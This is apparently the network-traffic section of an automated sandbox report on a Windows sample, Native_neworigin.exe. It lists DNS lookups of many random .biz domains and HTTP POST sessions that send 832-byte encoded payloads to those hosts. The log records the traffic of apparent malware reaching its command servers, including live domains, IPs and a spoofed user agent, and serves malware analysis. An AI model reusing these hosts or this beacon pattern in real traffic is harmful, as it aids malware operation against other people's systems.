Nov 20, 2024 10:26:42.295517921 CET | 1.1.1.1 | 192.168.2.5 | 0x9c4e | No error (0) | yunalwv.biz |  | 208.100.26.245 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:42.306484938 CET | 1.1.1.1 | 192.168.2.5 | 0x9c4e | No error (0) | yunalwv.biz |  | 208.100.26.245 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:43.188453913 CET | 1.1.1.1 | 192.168.2.5 | 0xeab5 | No error (0) | jpskm.biz |  | 34.211.97.45 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:43.942035913 CET | 1.1.1.1 | 192.168.2.5 | 0x73a3 | No error (0) | lrxdmhrr.biz |  | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:44.884773016 CET | 1.1.1.1 | 192.168.2.5 | 0xbfd | No error (0) | wllvnzb.biz |  | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:46.548763990 CET | 1.1.1.1 | 192.168.2.5 | 0x32c6 | No error (0) | gnqgo.biz |  | 18.208.156.248 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:47.301455975 CET | 1.1.1.1 | 192.168.2.5 | 0xb497 | No error (0) | jhvzpcfg.biz |  | 44.221.84.105 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:48.034125090 CET | 1.1.1.1 | 192.168.2.5 | 0xd414 | No error (0) | acwjcqqv.biz |  | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:50.262878895 CET | 1.1.1.1 | 192.168.2.5 | 0xe82f | No error (0) | vyome.biz |  | 18.246.231.120 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:51.228357077 CET | 1.1.1.1 | 192.168.2.5 | 0x722c | No error (0) | yauexmxk.biz |  | 18.208.156.248 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:51.252304077 CET | 1.1.1.1 | 192.168.2.5 | 0x722c | No error (0) | yauexmxk.biz |  | 18.208.156.248 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:51.989473104 CET | 1.1.1.1 | 192.168.2.5 | 0xacd1 | No error (0) | iuzpxe.biz |  | 13.251.16.150 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:51.990127087 CET | 1.1.1.1 | 192.168.2.5 | 0xacd1 | No error (0) | iuzpxe.biz |  | 13.251.16.150 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.638398886 CET1.1.1.1192.168.2.50x68f8No error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:55.131545067 CET1.1.1.1192.168.2.50x4545No error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:55.911798954 CET1.1.1.1192.168.2.50x7267No error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.530479908 CET1.1.1.1192.168.2.50x4d6eNo error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:58.973265886 CET1.1.1.1192.168.2.50x87a3No error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:59.963804007 CET1.1.1.1192.168.2.50x90e1No error (0)gvijgjwkh.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:27:00.582017899 CET1.1.1.1192.168.2.50x37f1No error (0)qpnczch.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:27:01.882874012 CET1.1.1.1192.168.2.50xc310No error (0)brsua.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                • gxe0.com
                                                                                                                                                                                                                                                                                                                                • api.ipify.org
                                                                                                                                                                                                                                                                                                                                • pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                • ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                • cvgrf.biz
                                                                                                                                                                                                                                                                                                                                • npukfztj.biz
                                                                                                                                                                                                                                                                                                                                • przvgke.biz
                                                                                                                                                                                                                                                                                                                                • knjghuig.biz
                                                                                                                                                                                                                                                                                                                                • lpuegx.biz
                                                                                                                                                                                                                                                                                                                                • vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                • xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                • ifsaia.biz
                                                                                                                                                                                                                                                                                                                                • saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                • vcddkls.biz
                                                                                                                                                                                                                                                                                                                                • fwiwk.biz
                                                                                                                                                                                                                                                                                                                                • tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                • deoci.biz
                                                                                                                                                                                                                                                                                                                                • gytujflc.biz
                                                                                                                                                                                                                                                                                                                                • qaynky.biz
                                                                                                                                                                                                                                                                                                                                • bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                • dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                • nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                • ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                • myups.biz
                                                                                                                                                                                                                                                                                                                                • oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                • yunalwv.biz
                                                                                                                                                                                                                                                                                                                                • lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                • wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                • gnqgo.biz
                                                                                                                                                                                                                                                                                                                                • jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                • acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                • yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                • iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                • sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                • ftxlah.biz
                                                                                                                                                                                                                                                                                                                                • typgfhb.biz
                                                                                                                                                                                                                                                                                                                                • gvijgjwkh.biz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49707 | 54.244.188.177 | 80 | 3176 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:24:47.482656956 CET | 354 | OUT | POST /lcoyxsnwq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:24:47.482656956 CET | 832 | OUT | Data Raw: fb c5 1c 26 48 d2 50 b0 34 03 00 00 30 9e 67 20 5b 2f ed ac 74 e0 d8 d0 e1 73 34 75 47 18 dc 11 bb eb 72 a2 7d 8a 15 05 76 7d c1 0b 10 82 21 0c 67 b0 9a c0 c0 77 32 5b c7 1e fe aa 28 5a ac 05 e5 e5 1b 79 42 f1 79 f2 46 08 e4 98 ef 59 0b 5e 10 c3
Data Ascii: &HP40g [/ts4uGr}v}!gw2[(ZyByFY^|I$g^0n]cv7o`LN A.-2t3-bo]1%',W1nq4.% BhIJx e:P2ve3njA3rD+bfX+
Nov 20, 2024 10:24:48.189553022 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 09:24:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=da70d66fb88a31bce13335b7513483fc|8.46.123.75|1732094688|1732094688|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                1192.168.2.54970818.141.10.107803176C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:48.861721039 CET354OUTPOST /clmhymdikmk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:48.862106085 CET832OUTData Raw: d0 55 8c 84 f2 17 0d ed 34 03 00 00 35 89 a8 36 5c 4b 97 fd f5 6a 63 e0 5d dd b2 fa 1c 4d dc 40 37 23 62 d7 0e 99 9b ab a5 d4 8d a6 b5 50 d8 46 0e 5e b3 a9 9f 71 a9 88 64 6b 4e cd fb 9c 63 7f 86 92 f6 45 6d 26 69 6b 87 e5 6d 91 63 0d 68 a2 a3 c8
                                                                                                                                                                                                                                                                                                                                Data Ascii: U456\Kjc]M@7#bPF^qdkNcEm&ikmch6YK#~G'dC!NRMyY!ib-v8H=jszQWQs5r/P?/4xZv,e')3qD:fmt49zgdx,!]
Timestamp: Nov 20, 2024 10:24:50.166235924 CET | Bytes transferred: 409 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 09:24:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e3af2c98811a6fdf8273033cfc6738c7|8.46.123.75|1732094689|1732094689|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 2 | Source IP: 192.168.2.5 | Source Port: 49722 | Destination IP: 54.244.188.177 | Destination Port: 80 | PID: 3176 | Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp: Nov 20, 2024 10:24:51.494556904 CET | Bytes transferred: 342 | Direction: OUT | Data:
POST /v HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Timestamp: Nov 20, 2024 10:24:52.180725098 CET | Bytes transferred: 407 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 09:24:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5cd5a45a143608883dbd7f8eadd4cb9c|8.46.123.75|1732094692|1732094692|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49731 | Destination IP: 44.221.84.105 | Destination Port: 80 | PID: 3176 | Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp: Nov 20, 2024 10:24:53.134459972 CET | Bytes transferred: 346 | Direction: OUT | Data:
POST /jo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Timestamp: Nov 20, 2024 10:24:53.595535994 CET | Bytes transferred: 410 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 09:24:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d461badf503e403dd1e26aa1fc3f4f27|8.46.123.75|1732094693|1732094693|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49738 | Destination IP: 172.234.222.143 | Destination Port: 80 | PID: 3176 | Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp: Nov 20, 2024 10:24:55.550132036 CET | Bytes transferred: 346 | Direction: OUT | Data:
POST /ksc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832


Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49746 | Destination IP: 172.234.222.143 | Destination Port: 80 | PID: 3176 | Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp: Nov 20, 2024 10:24:56.448538065 CET | Bytes transferred: 349 | Direction: OUT | Data:
POST /aunxkp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832


Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49757 | Destination IP: 18.141.10.107 | Destination Port: 80 | PID: 3176 | Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp: Nov 20, 2024 10:24:58.277299881 CET | Bytes transferred: 345 | Direction: OUT | Data:
POST /h HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:58.277348042 CET832OUTData Raw: e8 4d 2e 0d dc 57 9c 5e 34 03 00 00 5d 4e ec 55 54 59 8d 51 ac 18 94 fb 4a c7 9c e7 d9 1b 05 db c2 dd 5a 5a 0e b5 8e 89 f5 22 48 60 d7 b1 7e 24 1a ce 92 8a 04 e4 c7 8a c7 6f 08 00 9a a2 5a c1 de 1b 9e 65 8f bb 3b e7 81 d0 b6 a4 a3 b0 28 71 17 19
                                                                                                                                                                                                                                                                                                                                Data Ascii: M.W^4]NUTYQJZZ"H`~$oZe;(q2D0a/k\X."cX[dO++c[),)lpU WXn(\{)*8f,Am+O[|Ymvs>7S~c0bkkC
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:59.594585896 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:24:59 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=37e727efb4a6ade055396541f6bf8696|8.46.123.75|1732094699|1732094699|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49770 | 82.112.184.197 | 80 | 3176 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:24:59.986546040 CET | 358 | OUT | POST /sqxjvguhdtdacidd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:24:59.986573935 CET | 832 | OUT | Data Raw: 34 f6 3d af b7 f7 e3 08 34 03 00 00 8d c1 31 bd 25 5b 51 b2 f3 3c 0b 28 9c 8f 0b 40 ec 47 60 97 d5 c0 4b ad de fe cc 5c 48 ad 85 fc b3 bf 2e c8 99 20 9e f2 27 fc af 46 6a 62 18 8e 22 bd 51 9e de 26 d0 02 95 bd a5 96 3c 92 9b c4 25 4d 49 d4 3a ee
Data Ascii: 4=41%[Q<(@G`K\H. 'Fjb"Q&<%MI:qH#z%+W,\NB b/*$jVc&+uh5|_B\O|)a9NRODH',TZrq{6##&]6q{B-C{idT[5Ys~


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49777 | 82.112.184.197 | 80 | 3176 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:25:01.587620020 CET | 352 | OUT | POST /epmanlipym HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:25:01.587651968 CET | 832 | OUT | Data Raw: 79 f1 b3 da 4b b8 df 10 34 03 00 00 cd 51 e4 a2 4b f1 00 ef 9f 44 1e 5a 93 48 23 4c 17 b9 83 b1 67 4b 14 ed 1c bf 4c 4c 58 a8 c3 0b ba 7c e1 e3 79 2e 25 e7 1a 6c c2 59 a1 f7 16 c8 49 8e c8 22 94 0f 6c 35 d9 ea d3 ad 55 27 69 2e 11 d9 d7 ba 37 e1
Data Ascii: yK4QKDZH#LgKLLX|y.%lYI"l5U'i.74ssywS3%^ d!ULLNm,OGo>QPy$}QE@(Bt9Tvw`6$!SO%]yH2_rrriHmB)r}=*~Q{_<qD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49807 | 54.244.188.177 | 80 | 5488 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:25:09.376638889 CET | 355 | OUT | POST /vfpepibjtu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:25:09.376662016 CET | 832 | OUT | Data Raw: 55 f1 f2 66 d6 8e fe dc 34 03 00 00 0c 03 09 03 dc 87 9d bb b8 0c 25 41 df 1f d1 d6 49 46 8f 06 60 97 55 84 60 99 26 cb 6b f8 83 b5 86 d1 f6 4d b2 4b 50 e7 ba 1b 99 d8 45 28 c9 b0 3c 3d 27 3e 13 22 a0 4c 31 86 01 9d ff f5 9c 77 72 3e 59 6b 5a 34
Data Ascii: Uf4%AIF`U`&kMKPE(<='>"L1wr>YkZ4Yi.&wfQmcLWw2$f+hEmf-.#pj%;$s~}V?wLp5bJ",ikG\IA^M&DAfP
Nov 20, 2024 10:25:10.077310085 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 09:25:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8dffba7a888d53261e50af390797d767|8.46.123.75|1732094709|1732094709|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49814 | 18.141.10.107 | 80 | 5488 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:25:11.156630993 CET | 355 | OUT | POST /ctaniunjcxta HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:25:11.156670094 CET | 832 | OUT | Data Raw: ec 36 9b 53 64 b7 97 1e 34 03 00 00 73 78 3e 40 f4 e5 a1 3c 40 52 aa 80 b4 45 c1 95 ff 38 25 27 2a 57 9b 99 99 69 0c 24 1c 2e fc 2e c5 d5 df 8c 63 a5 c5 6d 85 1d fa a5 9a 78 3f 41 6f c4 da c4 0b db 7d 5b 62 18 15 5c 6d f3 18 38 2b 59 97 cf e9 34
Data Ascii: 6Sd4sx>@<@RE8%'*Wi$..cmx?Ao}[b\m8+Y4gSoTMQ]i(N4=2-V__Kzw0e0a~:6I.(^EK-'l{Y7eh+6v`7izSeB3Ji*>se.ZM
Nov 20, 2024 10:25:12.568881035 CET | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 09:25:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=24cc25bd20197b6573f8b0e134d4ac3c|8.46.123.75|1732094712|1732094712|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49830 | 54.244.188.177 | 80 | 5488 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:25:13.931135893 CET | 356 | OUT | POST /duhfjaeqhlnmwtn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:25:13.931168079 CET | 832 | OUT | Data Raw: 00 9b e3 f3 7c 62 1f c8 34 03 00 00 c5 38 93 29 9e 9b 80 74 67 00 62 06 e9 5e 79 f7 d4 0b fe c6 21 55 f6 f9 a3 99 5c 54 33 82 cf 35 3c 89 9b a6 69 ad 3d 22 ae 8f 18 69 8a 38 0f 06 68 30 9d f5 34 5f b2 35 58 53 56 06 b1 ca 66 e7 c7 a5 84 55 b3 fa
Data Ascii: |b48)tgb^y!U\T35<i="i8h04_5XSVfU'}Db/-AlqW7lu'g_#6DvT3`7yFvCZ::W|GeOdeW7i<^Q:N} EpCC/hhJl%[u
Nov 20, 2024 10:25:14.615372896 CET | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 09:25:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ab7f1f345c12e8bd362f7d1cbc4d1aa2|8.46.123.75|1732094714|1732094714|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49837 | 44.221.84.105 | 80 | 5488 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:25:14.818221092 CET | 351 | OUT | POST /khahgpo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:25:14.818324089 CET | 832 | OUT | Data Raw: 29 06 d1 fa d5 70 84 4d 34 03 00 00 83 d8 a3 cb 67 27 bd 0c 67 4e 44 27 41 30 69 ad a4 38 c9 15 21 c3 40 63 7d c1 2e d7 d6 59 1f bd e4 18 5c 8e 38 f6 7f 38 11 c1 fc 32 1b 3d 03 32 44 35 a7 cf 10 b4 2c 38 95 57 a3 e3 4a 5f aa 85 83 87 3e 81 28 83
Data Ascii: )pM4g'gND'A0i8!@c}.Y\882=2D5,8WJ_>()Vp}8nzg5Mk_#K2'=e|VUzB;K_yNzS'Q7n2j@^3Y'nlC*3a'q1;-I[D=x:'9r>Uf:Dux?
Nov 20, 2024 10:25:15.288743019 CET | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 09:25:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=51913fafa497fbbe5fa77d42676eb9ab|8.46.123.75|1732094715|1732094715|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49839 | 172.234.222.138 | 80 | 5488 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:25:15.744978905 CET | 352 | OUT | POST /xyttxtxgf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:25:15.745100021 CET | 832 | OUT | Data Raw: eb 49 fc ed af 9d 65 c8 34 03 00 00 3f 0e 2d 0b d9 27 20 e1 7f 5c 01 4a 95 50 1d 57 d1 cf d9 f0 8e bf ab 8b d1 dc f5 60 ca 57 2b b9 3d 81 90 55 af c8 c4 7b d6 77 07 38 59 13 ad 66 68 2b c7 73 89 a1 92 02 22 a1 87 b3 47 51 8d ff 53 d9 2e 8f 0a a1
Data Ascii: Ie4?-' \JPW`W+=U{w8Yfh+s"GQS.lZCG/M5Da+tD%^-o*#C^B^b5rwG9*LmXzO#S!r2Q+s


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
